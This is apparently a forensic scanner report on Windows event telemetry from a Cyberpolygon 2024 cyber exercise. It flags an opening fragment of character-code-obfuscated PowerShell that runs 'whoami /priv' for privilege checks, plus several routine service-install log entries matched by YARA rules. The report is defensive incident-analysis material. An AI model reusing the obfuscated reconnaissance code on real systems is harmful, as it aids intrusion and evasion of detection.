, 40 ,32 ,91,80 , 97 ,114 ,97 ,109 ,101 , 116 , 101 ,114,40,80, 111, 115,105, 116, 105 ,111 , 110,32,61 ,32,48,41,93 , 32 ,91,86 , 97 , 108,105,100, 97 ,116,101 ,78, 111 , 116, 78,117, 108, 108 ,79 , 114 ,69 ,109 ,112, 116,121 , 40 , 41 , 93 , 32 ,91 ,83,116 , 114, 105 , 110 ,103, 93 ,32 ,36 ,80,114 ,105, 118, 41,13 , 10 ,32 , 32,32 ,32 ,36, 114,101 , 115,32,61 ,32,36 , 78, 85 , 76 , 76, 59, 13,10, 32 , 32,32, 32 ,119, 104 , 111 ,97 , 109 ,105 , 32,47 , 112 , 114 , 105 ,118 , 32,124, 32,83 ,101, 108 ,101, 99 , 116,45 , 83, 116 ,114, 105, 110, 103,32,45, 80 ,97 ,116, 116 ,101 , 
114,110,32, 36 ,80 ,114 , 105, 118,32 , 124 , 32,70, 111 ,
SCORE:
60
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule Casing_Anomaly_Join / Detects suspicious casing of join statement
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • -joIN
RULEDATE_1:
2018-12-26
TAGS_1:
ANOMALY, CASING, SCRIPT, SUSP, T1027
RULENAME_1:
Casing_Anomaly_Join
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notices
Notice 1
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "WWnKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.340Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tAarSvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "pc00025", "os": {"name": "Windows 11 Pro", "platform": "windows", "version": "10.0", "build": "22631.4037", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}, "id": "4f4[...]10.24.69.11"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p", "ServiceName": "AarSvc_1b457e39", "ClientProcessId": "2932", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ParentProcessId": "648", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195186, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", 
"process": {"pid": 704, "thread": {"id": 780}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 2
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "WmnKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.348Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tcbdhsvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\n\tService Type: \t\t0xE0\n\tService Start Type:\t2\n\tService Account: \t\tLocalSystem"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"id": "4f4df1f2-238c-448d-b765-901e1c9f316b", "os": {"platform": "windows", "name": "Windows 11 Pro", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows"[...]9.11"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p", "ServiceName": "cbdhsvc_1b457e39", "ClientProcessId": "2932", "ParentProcessId": "648", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ServiceStartType": "2", "SubjectUserName": "PC00025$"}, "record_id": 195190, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", 
"process": {"pid": 704, "thread": {"id": 780}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 3
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "W2nKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.356Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tCredentialEnrollmentManagerUserSvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\CredentialEnrollmentManager.exe\n\tService Type: \t\t0xD0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "4f4df1f2-238c-448d-b765-901e1c9f316b", "os": {"name": "Windows 11 Pro", "platform": "windows", "version": "10.0", "build": "22631.4037", "kernel": "10.0.22621.4036 (WinBuild.160101.08[...]_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\CredentialEnrollmentManager.exe", "ServiceName": "CredentialEnrollmentManagerUserSvc_1b457e39", "ClientProcessId": "2932", "ParentProcessId": "648", "ClientProcessStartKey": "4503599627370561", "ServiceType": "0xd0", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195194, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", 
"process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 4
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "XGnKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.364Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "code": "4697", "action": "Security System Extension", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tMessagingService_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "pc00025", "os": {"platform": "windows", "name": "Windows 11 Pro", "version": "10.0", "build": "22631.4037", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}[...]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup", "ClientProcessId": "2932", "ServiceName": "MessagingService_1b457e39", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ParentProcessId": "648", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195198, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", 
"process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1:
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 5
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "XWnKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.372Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tP9RdrService_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k P9RdrService -p\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "4f4df1f2-238c-448d-b765-901e1c9f316b", "name": "pc00025", "os": {"name": "Windows 11 Pro", "platform": "windows", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)"[...].11"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k P9RdrService -p", "ClientProcessId": "2932", "ServiceName": "P9RdrService_1b457e39", "ParentProcessId": "648", "ClientProcessStartKey": "4503599627370561", "ServiceType": "0xe0", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195202, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", 
"process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1:
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 6
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "XmnKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.379Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tUdkUserSvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k UdkSvcGroup\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"name": "pc00025", "os": {"name": "Windows 11 Pro", "platform": "windows", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}, "id": "4f[...].24.69.11"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k UdkSvcGroup", "ClientProcessId": "2932", "ServiceName": "UdkUserSvc_1b457e39", "ParentProcessId": "648", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195206, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", 
"process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1:
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 7
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "X2nKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.388Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tWpnUserService_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\n\tService Type: \t\t0xE0\n\tService Start Type:\t2\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "4f4df1f2-238c-448d-b765-901e1c9f316b", "os": {"name": "Windows 11 Pro", "platform": "windows", "version": "10.0", "build": "22631.4037", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windo[...]"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup", "ClientProcessId": "2932", "ServiceName": "WpnUserService_1b457e39", "ServiceType": "0xe0", "ParentProcessId": "648", "ClientProcessStartKey": "4503599627370561", "ServiceStartType": "2", "SubjectUserName": "PC00025$"}, "record_id": 195210, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", 
"process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1:
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 8
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "1mnKt5EBNKI3r7qcapMD", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.342Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "code": "4697", "action": "Security System Extension", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tBcastDVRUserService_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "4f4df1f2-238c-448d-b765-901e1c9f316b", "os": {"name": "Windows 11 Pro", "platform": "windows", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type"[...]gs": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService", "ServiceName": "BcastDVRUserService_1b457e39", "ClientProcessId": "2932", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ParentProcessId": "648", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195187, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", 
"process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1:
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 9
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
